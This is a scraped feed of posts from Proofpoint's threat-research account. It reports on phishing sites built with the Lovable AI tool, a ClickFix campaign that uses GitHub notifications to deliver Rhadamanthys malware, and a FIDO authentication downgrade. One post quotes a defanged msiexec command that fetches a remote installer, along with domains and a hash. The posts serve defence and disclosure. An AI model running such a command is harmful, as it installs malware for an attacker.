threatinsight Profile Banner
Threat Insight Profile
Threat Insight

@threatinsight

Followers
11K
Following
274
Media
1K
Statuses
4K

@Proofpoint's insights on targeted attacks & the security landscape. Follow us on Bluesky: https://t.co/8OVfhotdeP

Joined August 2013
Don't wanna be here? Send us removal request.
@threatinsight
Threat Insight
12 days
Something #spicy is coming to the next Only Malware in the Building #podcast—dropping September 2nd. 🌶️. Bookmark the show page and reserve your seat 🪑 at the table alongside Selena Larson, Dave Bittner, and Keith Mularski. 🔥 You won't want to miss it!
Tweet media one
0
1
2
@grok
Grok
23 days
Introducing Grok Imagine.
2K
4K
28K
@threatinsight
Threat Insight
14 days
With automatic web creation tools, threat actors can spend more time on multi-stage attack chain and more sophisticated tooling capabilities. Developers of such tools should be mindful of opportunities for abuse and implement safeguards to prevent exploitation. #Lovable.
0
1
2
@threatinsight
Threat Insight
14 days
Our blog has further insights on how Lovable is being leveraged by threat actors. This activity demonstrates how AI tools can significantly lower the barrier to entry for cybercriminals, especially those focused on creating social engineering content that appeal to the end user.
1
1
2
@threatinsight
Threat Insight
14 days
We've partnered with Lovable's Trust & Safety team to identify and take down hundreds of malicious domains. The company says it's introducing security protections to proactively identify/block fraud activity and malicious users. We thank them for their quick response & action.
1
1
1
@threatinsight
Threat Insight
14 days
When we replicated the malicious activity, we encountered no guardrails or errors in trying to create our fake phishing website. The website we generated was equipped with capabilities that impersonated prominent enterprise software to steal credentials.
1
1
1
@threatinsight
Threat Insight
14 days
We have flagged tens of thousands of Lovable URLs as threats each month in email and SMS data since Feb 2025. Threat actors create or clone websites that impersonate prominent brands, use CAPTCHA for filtering, and then post credentials to Telegram. Other cybersecurity vendors,
Tweet media one
1
1
2
@threatinsight
Threat Insight
14 days
You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals. We have observed threat actor campaigns leveraging the AI-generated website builder Lovable to create and host cred phishing, malware, and fraud websites.
Tweet media one
1
7
15
@threatinsight
Threat Insight
15 days
Example system commands:. C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe. Bitly redirect: hxxps://gitsecguards[.]com. ClickFix Landing domain: security[.]flaxergaurds[.]com. Organizations are encouraged to restrict PowerShell.
0
2
6
@threatinsight
Threat Insight
15 days
Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn. Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2.
1
1
5
@threatinsight
Threat Insight
15 days
CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.
1
1
3
@threatinsight
Threat Insight
15 days
Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject. CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.
1
1
3
@threatinsight
Threat Insight
15 days
Following the instructions will initiate a command that downloads and executes malware. The specific malware may vary throughout the campaign. At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.
1
1
2
@threatinsight
Threat Insight
15 days
The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to
Tweet media one
2
4
9
@threatinsight
Threat Insight
15 days
We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they
Tweet media one
1
4
9
@threatinsight
Threat Insight
15 days
Proofpoint @threatinsight identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys. We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. 🔍.
@anyrun_app
ANY.RUN
22 days
🚨 How #Rhadamanthys Stealer Slips Past Defenses using ClickFix.⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging. 👾 While earlier
Tweet media one
3
27
83
@threatinsight
Threat Insight
21 days
As more companies adopt “phishing-resistant” authentication methods like FIDO, attackers could evolve their existing tactics, techniques, and procedures (TTPs) by incorporating FIDO authentication downgrade into kill chains. Read our blog for more info on this potential threat.
0
1
3
@threatinsight
Threat Insight
21 days
We were successfully able to craft a dedicated phishlet for the Evilginx AiTM attack framework and execute a FIDO downgrade. If we were a threat actor, we could have intercepted login credentials or launched post-compromise actions such as data exfiltration and lateral movement.
1
1
2
@threatinsight
Threat Insight
21 days
The technique involves using a dedicated phishlet to downgrade FIDO-based authentication to less secure methods. Our blog shows how such FIDO downgrades can be executed against Microsoft Entra ID users in a way that is not limited to any specific implementation.
1
1
1
@threatinsight
Threat Insight
21 days
While the tactic has not yet been observed in the wild, the finding poses a significant emerging threat and questions the reliability of FIDO-passkey implementations, a highly recommended authentication method used to verify user identities and improving online security.
1
1
2